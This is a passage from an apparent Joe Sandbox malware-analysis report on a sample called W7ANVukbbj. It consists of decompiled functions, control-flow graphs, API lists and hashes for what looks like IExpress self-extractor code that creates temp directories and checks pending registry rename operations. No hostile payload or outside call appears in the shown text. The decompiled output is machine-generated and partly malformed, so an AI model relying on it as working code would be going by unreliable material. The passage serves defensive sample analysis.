                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086541F
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086542B
                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865434
                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865452
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                          • API String ID: 1082909758-3862032828
                                                                                                                                                                                                          • Opcode ID: 29fdb1bc582fe9ccf01c8284b8bb7bfaf1755536c6701e4cf56531e8de70ac5a
                                                                                                                                                                                                          • Instruction ID: 8f0b1c430133f1a836f7d183fce444a2b71f2fcfe21d9033555decd6cc1e8a7d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29fdb1bc582fe9ccf01c8284b8bb7bfaf1755536c6701e4cf56531e8de70ac5a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4115771300914B7D7249B369C09FAF376DFFD2311F021164F607E2290DEB489428AA7
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 519 86256d-86257d 520 862622-862627 call 8624e0 519->520 521 862583-862589 519->521 526 862629-86262f 520->526 522 86258b 521->522 523 8625e8-862607 RegOpenKeyExA 521->523 525 862591-862595 522->525 522->526 527 8625e3-8625e6 523->527 528 862609-862620 RegQueryInfoKeyA 523->528 525->526 530 86259b-8625ba RegOpenKeyExA 525->530 527->526 531 8625d1-8625dd RegCloseKey 528->531 530->527 532 8625bc-8625cb RegQueryValueExA 530->532 531->527 532->531
                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E0086256D(signed int __ecx) {
                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                          				int _t31;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                          				_t31 = 0;
                                                                                                                                                                                                          				if(_t13 == 0) {
                                                                                                                                                                                                          					_t31 = E008624E0(_t26);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t34 = _t13 - 1;
                                                                                                                                                                                                          					if(_t34 == 0) {
                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                          						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                          							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                          							if(_t24 == 0) {
                                                                                                                                                                                                          								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                          								L6:
                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                          								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                          								RegCloseKey(_v12); // executed
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							_t31 = _v8;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t31;
                                                                                                                                                                                                          				goto L12;
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          0x00862572
                                                                                                                                                                                                          0x00862573
                                                                                                                                                                                                          0x00862575
                                                                                                                                                                                                          0x00862578
                                                                                                                                                                                                          0x0086257d
                                                                                                                                                                                                          0x00862627
                                                                                                                                                                                                          0x00862583
                                                                                                                                                                                                          0x00862586
                                                                                                                                                                                                          0x00862589
                                                                                                                                                                                                          0x008625eb
                                                                                                                                                                                                          0x00862607
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862609
                                                                                                                                                                                                          0x0086261a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086261a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086258b
                                                                                                                                                                                                          0x0086258b
                                                                                                                                                                                                          0x0086259e
                                                                                                                                                                                                          0x008625b2
                                                                                                                                                                                                          0x008625ba
                                                                                                                                                                                                          0x008625cb
                                                                                                                                                                                                          0x008625d1
                                                                                                                                                                                                          0x008625d6
                                                                                                                                                                                                          0x008625da
                                                                                                                                                                                                          0x008625dd
                                                                                                                                                                                                          0x008625dd
                                                                                                                                                                                                          0x008625e3
                                                                                                                                                                                                          0x008625e3
                                                                                                                                                                                                          0x008625e3
                                                                                                                                                                                                          0x0086258b
                                                                                                                                                                                                          0x00862589
                                                                                                                                                                                                          0x0086262f
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00864096,00864096,?,00861ED3,00000001,00000000,?,?,00864137,?), ref: 008625B2
                                                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00864096,?,00861ED3,00000001,00000000,?,?,00864137,?,00864096), ref: 008625CB
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,00861ED3,00000001,00000000,?,?,00864137,?,00864096), ref: 008625DD
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00864096,00864096,?,00861ED3,00000001,00000000,?,?,00864137,?), ref: 008625FF
                                                                                                                                                                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00864096,00000000,00000000,00000000,00000000,?,00861ED3,00000001,00000000), ref: 0086261A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 008625F5
                                                                                                                                                                                                          • System\CurrentControlSet\Control\Session Manager, xrefs: 008625A8
                                                                                                                                                                                                          • PendingFileRenameOperations, xrefs: 008625C3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                          • API String ID: 2209512893-559176071
                                                                                                                                                                                                          • Opcode ID: 827dda1c0a5501ea9da9ea15c2ffa6b3f8d6ae122f704b857237aa8c113d4b7c
                                                                                                                                                                                                          • Instruction ID: b4079fda1df6d7f229d13cea93300e9a77d6316fed9cbac928db1be692331c18
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 827dda1c0a5501ea9da9ea15c2ffa6b3f8d6ae122f704b857237aa8c113d4b7c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26116D35942628FB9B209B92DC0EDFBBE6CFB117A5F124195F809E2110DA705A44DBA2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 533 866a60-866a91 call 867155 call 867208 GetStartupInfoW 539 866a93-866aa2 533->539 540 866aa4-866aa6 539->540 541 866abc-866abe 539->541 542 866aaf-866aba Sleep 540->542 543 866aa8-866aad 540->543 544 866abf-866ac5 541->544 542->539 543->544 545 866ac7-866acf _amsg_exit 544->545 546 866ad1-866ad7 544->546 549 866b0b-866b11 545->549 547 866b05 546->547 548 866ad9-866ae9 call 866c3f 546->548 547->549 553 866aee-866af2 548->553 551 866b13-866b24 _initterm 549->551 552 866b2e-866b30 549->552 551->552 554 866b32-866b39 552->554 555 866b3b-866b42 552->555 553->549 556 866af4-866b00 553->556 554->555 557 866b67-866b71 555->557 558 866b44-866b51 call 867060 555->558 560 866c39-866c3e call 86724d 556->560 559 866b74-866b79 557->559 558->557 570 866b53-866b65 558->570 562 866bc5-866bc8 559->562 563 866b7b-866b7d 559->563 566 866bd6-866be3 _ismbblead 562->566 567 866bca-866bd3 562->567 568 866b94-866b98 563->568 569 866b7f-866b81 563->569 572 866be5-866be6 566->572 573 866be9-866bed 566->573 567->566 575 866ba0-866ba2 568->575 576 866b9a-866b9e 568->576 569->562 574 866b83-866b85 569->574 570->557 572->573 573->559 577 866c1e-866c25 573->577 574->568 578 866b87-866b8a 574->578 579 866ba3-866bbc call 862bfb 575->579 576->579 582 866c27-866c2d _cexit 577->582 583 866c32 577->583 578->568 581 866b8c-866b92 578->581 579->577 586 866bbe-866bbf exit 579->586 581->574 582->583 583->560 586->562
                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                          			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                          				signed int* _t25;
                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                          				int _t30;
                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                          				signed char _t41;
                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                          				intOrPtr* _t60;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				E00867155();
                                                                                                                                                                                                          				_push(0x58);
                                                                                                                                                                                                          				_push(0x8672b8);
                                                                                                                                                                                                          				E00867208(__ebx, __edi, __esi);
                                                                                                                                                                                                          				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                          				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                          				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                          				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                          				_t53 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                          					if(0 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(0 != _t56) {
                                                                                                                                                                                                          						Sleep(0x3e8);
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t58 = 1;
                                                                                                                                                                                                          						_t53 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                          					_t67 =  *0x8688b0 - _t58; // 0x2
                                                                                                                                                                                                          					if(_t67 != 0) {
                                                                                                                                                                                                          						__eflags =  *0x8688b0; // 0x2
                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                          							 *0x8681e4 = _t58;
                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							 *0x8688b0 = _t58;
                                                                                                                                                                                                          							_t37 = E00866C3F(0x8610b8, 0x8610c4); // executed
                                                                                                                                                                                                          							__eflags = _t37;
                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                          								goto L13;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                          								_t30 = 0xff;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_push(0x1f);
                                                                                                                                                                                                          						L00866FF4();
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						_t68 =  *0x8688b0 - _t58; // 0x2
                                                                                                                                                                                                          						if(_t68 == 0) {
                                                                                                                                                                                                          							_push(0x8610b4);
                                                                                                                                                                                                          							_push(0x8610ac);
                                                                                                                                                                                                          							L00867202();
                                                                                                                                                                                                          							 *0x8688b0 = 2;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t53 == 0) {
                                                                                                                                                                                                          							 *0x8688ac = 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t71 =  *0x8688b4;
                                                                                                                                                                                                          						if( *0x8688b4 != 0 && E00867060(_t71, 0x8688b4) != 0) {
                                                                                                                                                                                                          							_t60 =  *0x8688b4; // 0x0
                                                                                                                                                                                                          							 *0x86a288(0, 2, 0);
                                                                                                                                                                                                          							 *_t60();
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                          						_t59 =  *_t25;
                                                                                                                                                                                                          						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                          						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t41 =  *_t59;
                                                                                                                                                                                                          							if(_t41 > 0x20) {
                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_t41 != 0) {
                                                                                                                                                                                                          								if(_t54 != 0) {
                                                                                                                                                                                                          									goto L32;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                          										_t59 = _t59 + 1;
                                                                                                                                                                                                          										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                          										_t41 =  *_t59;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                          							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                          								_t29 = 0xa;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push(_t29);
                                                                                                                                                                                                          							_t30 = E00862BFB(0x860000, 0, _t59); // executed
                                                                                                                                                                                                          							 *0x8681e0 = _t30;
                                                                                                                                                                                                          							__eflags =  *0x8681f8;
                                                                                                                                                                                                          							if( *0x8681f8 == 0) {
                                                                                                                                                                                                          								exit(_t30); // executed
                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags =  *0x8681e4;
                                                                                                                                                                                                          							if( *0x8681e4 == 0) {
                                                                                                                                                                                                          								__imp___cexit();
                                                                                                                                                                                                          								_t30 =  *0x8681e0; // 0x0
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                          							goto L40;
                                                                                                                                                                                                          							L32:
                                                                                                                                                                                                          							__eflags = _t41 - 0x22;
                                                                                                                                                                                                          							if(_t41 == 0x22) {
                                                                                                                                                                                                          								__eflags = _t54;
                                                                                                                                                                                                          								_t15 = _t54 == 0;
                                                                                                                                                                                                          								__eflags = _t15;
                                                                                                                                                                                                          								_t54 = 0 | _t15;
                                                                                                                                                                                                          								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                          							__imp___ismbblead(_t26);
                                                                                                                                                                                                          							__eflags = _t26;
                                                                                                                                                                                                          							if(_t26 != 0) {
                                                                                                                                                                                                          								_t59 = _t59 + 1;
                                                                                                                                                                                                          								__eflags = _t59;
                                                                                                                                                                                                          								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t59 = _t59 + 1;
                                                                                                                                                                                                          							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L40:
                                                                                                                                                                                                          					return E0086724D(_t30);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t58 = 1;
                                                                                                                                                                                                          				__eflags = 1;
                                                                                                                                                                                                          				goto L7;
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          0x00866a60
                                                                                                                                                                                                          0x00866a6a
                                                                                                                                                                                                          0x00866a6c
                                                                                                                                                                                                          0x00866a71
                                                                                                                                                                                                          0x00866a78
                                                                                                                                                                                                          0x00866a7f
                                                                                                                                                                                                          0x00866a85
                                                                                                                                                                                                          0x00866a8e
                                                                                                                                                                                                          0x00866a91
                                                                                                                                                                                                          0x00866a93
                                                                                                                                                                                                          0x00866a9c
                                                                                                                                                                                                          0x00866aa2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866aa6
                                                                                                                                                                                                          0x00866ab4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866aa8
                                                                                                                                                                                                          0x00866aaa
                                                                                                                                                                                                          0x00866aab
                                                                                                                                                                                                          0x00866aab
                                                                                                                                                                                                          0x00866abf
                                                                                                                                                                                                          0x00866abf
                                                                                                                                                                                                          0x00866ac5
                                                                                                                                                                                                          0x00866ad1
                                                                                                                                                                                                          0x00866ad7
                                                                                                                                                                                                          0x00866b05
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866ad9
                                                                                                                                                                                                          0x00866ad9
                                                                                                                                                                                                          0x00866ae9
                                                                                                                                                                                                          0x00866af0
                                                                                                                                                                                                          0x00866af2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866af4
                                                                                                                                                                                                          0x00866af4
                                                                                                                                                                                                          0x00866afb
                                                                                                                                                                                                          0x00866afb
                                                                                                                                                                                                          0x00866af2
                                                                                                                                                                                                          0x00866ac7
                                                                                                                                                                                                          0x00866ac7
                                                                                                                                                                                                          0x00866ac9
                                                                                                                                                                                                          0x00866b0b
                                                                                                                                                                                                          0x00866b0b
                                                                                                                                                                                                          0x00866b11
                                                                                                                                                                                                          0x00866b13
                                                                                                                                                                                                          0x00866b18
                                                                                                                                                                                                          0x00866b1d
                                                                                                                                                                                                          0x00866b24
                                                                                                                                                                                                          0x00866b24
                                                                                                                                                                                                          0x00866b30
                                                                                                                                                                                                          0x00866b39
                                                                                                                                                                                                          0x00866b39
                                                                                                                                                                                                          0x00866b3b
                                                                                                                                                                                                          0x00866b42
                                                                                                                                                                                                          0x00866b57
                                                                                                                                                                                                          0x00866b5f
                                                                                                                                                                                                          0x00866b65
                                                                                                                                                                                                          0x00866b65
                                                                                                                                                                                                          0x00866b67
                                                                                                                                                                                                          0x00866b6c
                                                                                                                                                                                                          0x00866b6e
                                                                                                                                                                                                          0x00866b71
                                                                                                                                                                                                          0x00866b74
                                                                                                                                                                                                          0x00866b74
                                                                                                                                                                                                          0x00866b79
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866b7d
                                                                                                                                                                                                          0x00866b81
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866b83
                                                                                                                                                                                                          0x00866b8c
                                                                                                                                                                                                          0x00866b8d
                                                                                                                                                                                                          0x00866b90
                                                                                                                                                                                                          0x00866b90
                                                                                                                                                                                                          0x00866b83
                                                                                                                                                                                                          0x00866b81
                                                                                                                                                                                                          0x00866b94
                                                                                                                                                                                                          0x00866b98
                                                                                                                                                                                                          0x00866ba2
                                                                                                                                                                                                          0x00866b9a
                                                                                                                                                                                                          0x00866b9a
                                                                                                                                                                                                          0x00866b9a
                                                                                                                                                                                                          0x00866ba3
                                                                                                                                                                                                          0x00866bab
                                                                                                                                                                                                          0x00866bb0
                                                                                                                                                                                                          0x00866bb5
                                                                                                                                                                                                          0x00866bbc
                                                                                                                                                                                                          0x00866bbf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866bbf
                                                                                                                                                                                                          0x00866c1e
                                                                                                                                                                                                          0x00866c25
                                                                                                                                                                                                          0x00866c27
                                                                                                                                                                                                          0x00866c2d
                                                                                                                                                                                                          0x00866c2d
                                                                                                                                                                                                          0x00866c32
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866bc5
                                                                                                                                                                                                          0x00866bc5
                                                                                                                                                                                                          0x00866bc8
                                                                                                                                                                                                          0x00866bcc
                                                                                                                                                                                                          0x00866bce
                                                                                                                                                                                                          0x00866bce
                                                                                                                                                                                                          0x00866bd1
                                                                                                                                                                                                          0x00866bd3
                                                                                                                                                                                                          0x00866bd3
                                                                                                                                                                                                          0x00866bd6
                                                                                                                                                                                                          0x00866bda
                                                                                                                                                                                                          0x00866be1
                                                                                                                                                                                                          0x00866be3
                                                                                                                                                                                                          0x00866be5
                                                                                                                                                                                                          0x00866be5
                                                                                                                                                                                                          0x00866be6
                                                                                                                                                                                                          0x00866be6
                                                                                                                                                                                                          0x00866be9
                                                                                                                                                                                                          0x00866bea
                                                                                                                                                                                                          0x00866bea
                                                                                                                                                                                                          0x00866b74
                                                                                                                                                                                                          0x00866c39
                                                                                                                                                                                                          0x00866c3e
                                                                                                                                                                                                          0x00866c3e
                                                                                                                                                                                                          0x00866abe
                                                                                                                                                                                                          0x00866abe
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00867155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00867182
                                                                                                                                                                                                            • Part of subcall function 00867155: GetCurrentProcessId.KERNEL32 ref: 00867191
                                                                                                                                                                                                            • Part of subcall function 00867155: GetCurrentThreadId.KERNEL32 ref: 0086719A
                                                                                                                                                                                                            • Part of subcall function 00867155: GetTickCount.KERNEL32 ref: 008671A3
                                                                                                                                                                                                            • Part of subcall function 00867155: QueryPerformanceCounter.KERNEL32(?), ref: 008671B8
                                                                                                                                                                                                          • GetStartupInfoW.KERNEL32(?,008672B8,00000058), ref: 00866A7F
                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00866AB4
                                                                                                                                                                                                          • _amsg_exit.MSVCRT ref: 00866AC9
                                                                                                                                                                                                          • _initterm.MSVCRT ref: 00866B1D
                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00866B49
                                                                                                                                                                                                          • exit.KERNELBASE ref: 00866BBF
                                                                                                                                                                                                          • _ismbblead.MSVCRT ref: 00866BDA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 836923961-0
                                                                                                                                                                                                          • Opcode ID: 5c03a0797b3ec54f5067ad6fed5077024d42258690f144ed371b3b97f8d40043
                                                                                                                                                                                                          • Instruction ID: f0cd7225214efeebc5ae83f019f6a41434721a2c0952c268799f9387f8c9d1b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c03a0797b3ec54f5067ad6fed5077024d42258690f144ed371b3b97f8d40043
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D4122309447A9CFDB219B68DC1876A77E1FB44735F27022AE846E3290EFB44C508B82
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 587 8658c8-8658d5 588 8658d8-8658dd 587->588 588->588 589 8658df-8658f1 LocalAlloc 588->589 590 8658f3-865901 call 8644b9 589->590 591 865919-865959 call 861680 call 86658a CreateFileA LocalFree 589->591 594 865906-865910 call 866285 590->594 591->594 601 86595b-86596c CloseHandle GetFileAttributesA 591->601 600 865912-865918 594->600 601->594 602 86596e-865970 601->602 602->594 603 865972-86597b 602->603 603->600
                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E008658C8(intOrPtr* __ecx) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                          				signed char _t16;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                          				intOrPtr* _t27;
                                                                                                                                                                                                          				CHAR* _t33;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_t33 = __ecx;
                                                                                                                                                                                                          				_t27 = __ecx;
                                                                                                                                                                                                          				_t23 = __ecx + 1;
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					_t6 =  *_t27;
                                                                                                                                                                                                          					_t27 = _t27 + 1;
                                                                                                                                                                                                          				} while (_t6 != 0);
                                                                                                                                                                                                          				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                          				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                          				if(_t20 != 0) {
                                                                                                                                                                                                          					E00861680(_t20, _t36, _t33);
                                                                                                                                                                                                          					E0086658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                          					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                          					_v8 = _t10;
                                                                                                                                                                                                          					LocalFree(_t20);
                                                                                                                                                                                                          					_t12 = _v8;
                                                                                                                                                                                                          					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						CloseHandle(_t12);
